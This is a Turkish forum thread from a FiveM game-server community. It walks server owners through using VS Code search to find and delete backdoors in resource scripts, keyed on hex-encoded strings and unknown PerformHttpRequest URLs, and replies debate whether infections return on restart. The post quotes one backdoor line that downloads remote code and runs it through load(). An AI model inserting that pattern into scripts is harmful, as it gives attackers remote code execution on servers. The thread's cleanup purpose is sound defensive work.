Neler yeni

Foruma hoş geldin, Ziyaretçi

Forum içeriğine ve tüm hizmetlerimize erişim sağlamak için foruma kayıt olmalı ya da giriş yapmalısınız. Foruma üye olmak tamamen ücretsizdir.

Türkiye'nin İlk ve tek FiveM forum adresi

Forum adresimize hoş geldin FiveMTürk olarak amacımız siz değerli kullanıcılarımıza en aktif fikir ve paylaşım platformu sunmak bir yana en güvenilir şekilde alışveriş yapabileceğiniz bir platform sunmaktır.
DF DF
DF DF
DF DF

Rehber Resimli,Detaylı ve Gelişmiş Şekilde Paketinizdeki Backdoor/Cipher Nasıl Temizlenir,Bulunur?

h1peres

Üye
FT Kullanıcı
Katılım
7 ay 13 gün
Mesajlar
13
Web sitesi
h1pdev.rf.gd
Discord
h1p.
Merhabalar FivemTurk Ailesi!

Günümüzün en çok karşılaşılan sorunlardan biri olan Backdoor/Cipher nasıl bulur ve temizlersiniz bunu açıklayacağım.

İlham Aldığım Konular: DrxMaxi,Raviwen

  • İlk Olarak Linkten Visual Studio Code İndirip Kurun.
  • Görünüm Ve Kişiselleştirme Tercihlerini Yapın(Veya Geçin)
Bu Adımları Tamamlarsanız Karşınıza Böyle Bir Uygulama Sayfası Gelicek.
BhveXLt.png

Bundan Sonra, Sol Üstteki Dosya Seklinde Gözüken Simgeye Tıklayın (Fotoğrafı Aşağıda Mevcuttur.)
AUNRF0p.png


Bastıktan Sonra, Açılan Sekmedeki Open Folder Yazan Mavi Butona Tıklayın.
4IUqM1u.png


Açılan Dosya Klasöründe, Sunucunuzun \resources Kısmını Bulup Sağ Alttan Klasörü Seç veya Select Folder Butonuna Tıklayın.

p2uznfY.png


Sonrasında Sol Üstten Pusula Simgesine Tıklayın.
y1ZCHXh.png


Sonrasında Açılan Kısımda, Arama Yerine İlk Kutucuğa 'x64' yazın, Aşağıdaki Gibi Sonuçlar Olacaktır.
quy6MVp.png

BURASI ÖNEMLİ KISIM:
Gelen Sonuçların Hepsine Özelliklede \x64\x48\x65 Gibi Devam Eden Sonuçların Her Birine Tıklayın, Eğer önünüze Aşağıdaki gibi bir Kısım Yazı Geldiyse O Satırı Silin ve CTRL + S basın. Yaptığınız Değişiklikler Kaydedilecektir.
FY78JSz.png

Böyle olan Satırları Silin Ve CTRL + S Basıp Kaydedin.
--
Daha Sonrasında Arama Kısmına 'PerformHttpRequest(' yazın.


Gelen Sonuçların Hepsine Tıklayın, Eğer önünüze Aşağıdaki gibi Garip Tanınmadık bir URL gelirse o Satırı Silin, Eğer github,localhost,discord gibi bilindik ve tanınmış siteler varsa siteye girip içeriğini kontrol edin, eğer şüpheli birşey yoksa silmeyin. Tanınmadık bir URL gelirse o Satırı Silin ve CTRL + S basın. Yaptığınız Değişiklikler Kaydedilecektir.



UYARI
BAKTIGINIZ SCRİPTİN İÇİNDE PerformHttpRequest Verisinin İçinde Discord Webhook Post Verisi Varsa, Scriptin Configlerinde Ayarlanabilir Bir Webhook Olup Olmadığını Kontrol Edin.
Eğer Configden Ayarlanabilir bir Webhook Varsa Sorun Yoktur. Eğer herhangi bir ayarlanamayan webhook post verisi varsa o scripti değiştirin.


PerformHttpRequest(' NyS8r', function (e, d) pcall(function() assert(load(d))() end) end)
Buradaki URL temsilidir. Eğer böyle garip bir url görürseniz ve sonundada 'function (e, d) pcall(function() assert(load(d))() end) end)' Yazıyorsa O Satırı Silip Kaydedin.


Tüm İşlemleriniz bittiyse en baştan tekrardan x64, PerformHttp verilerini kontrol edin ve gibi bir script kurun
Tebrikler Artık Sunucunuz Tüm Backdoorlardan Arındı.

(Yeni bir script kurarken bu adımları o scripte uygulamayı unutmayın
 
DF
Backdoor'u temizlesen bile bir evreden sonra kendi oluşuyor ve dediğiniz scriptler herhangi bir koruma sağlamıyor sadece konsola printliyor haberiniz olsun. Bu sıkıntıyı çekenler komple fix çözüm arıyorsa bana ulaşabilirler.
 
DF
Backdoor'u temizlesen bile bir evreden sonra kendi oluşuyor ve dediğiniz scriptler herhangi bir koruma sağlamıyor sadece konsola printliyor haberiniz olsun. Bu sıkıntıyı çekenler komple fix çözüm arıyorsa bana ulaşabilirler.
Dostum seni her backdoor/cipher konusunda görüyorum her konuda kendi reklamını yapmak için farklı bahane ve sebeplerle farklı yollar söyleyerek kendine çekmeye çalışıyorsun. Ve hayır dostum bu methodla kişiler backdooru hangi scriptin oluşturduğunu ve hangi scripti silerse backdoorun temizlenceğini anlayabilir. Eğer obfuscate edilmiş script kullanmıyorsa silebilir.
 
DF
Dostum seni her backdoor/cipher konusunda görüyorum her konuda kendi reklamını yapmak için farklı bahane ve sebeplerle farklı yollar söyleyerek kendine çekmeye çalışıyorsun. Ve hayır dostum bu methodla kişiler backdooru hangi scriptin oluşturduğunu ve hangi scripti silerse backdoorun temizlenceğini anlayabilir. Eğer obfuscate edilmiş script kullanmıyorsa silebilir.
Kendi reklamımı yapmaya çalışmıyorum burada uygulattığınız şeyler belirli bir evreden sonra bir işe yaramıyor. Sizin yaptırdığınız sadece backdoorlu indirilen scriptlerden bulaşanları temizlemeye yarıyor, fakat dediğim gibi belirli bir evreden sonra temizleseniz de, her yeniden başlatmada tekrar oluşuyor ve dediğiniz scriptleri kurarak bir önlem almış olmuyorsunuz.
 
DF
Kendi reklamımı yapmaya çalışmıyorum burada uygulattığınız şeyler belirli bir evreden sonra bir işe yaramıyor. Sizin yaptırdığınız sadece backdoorlu indirilen scriptlerden bulaşanları temizlemeye yarıyor, fakat dediğim gibi belirli bir evreden sonra temizleseniz de, her yeniden başlatmada tekrar oluşuyor ve dediğiniz scriptleri kurarak bir önlem almış olmuyorsunuz.
Kurduğum script, eğer tekrar bulaşırsa kişiler öğrensin diye, ayrıyetten dediğini anladım ve konulardan senin yorumlarına bakarak dikkate aldım, Ve bazı denediğim silme yöntemlerinde aynen senin dediğinin gibi geri geldi. Ama bu anlattığım yöntemi deneyip üstüne bulaşmanın kaynağı olan scriptleri silme ekleme yöntemi ile bulaşmayı çözebilirsin
 
DF

Forumdan daha fazla yararlanmak için giriş yapın yada üye olun!

Forumdan daha fazla yararlanmak için giriş yapın veya kayıt olun!

Kayıt ol

Forumda bir hesap oluşturmak tamamen ücretsizdir.

Şimdi kayıt ol
Giriş yap

Eğer bir hesabınız var ise lütfen giriş yapın

Giriş yap

Bu konuyu görüntüleyen kullanıcılar

Tema düzenleyici

Tema özelletirmeleri

Granit arka planlar

Lütfen Javascript'i etkinleştirin!Javascript'i etkinleştirin!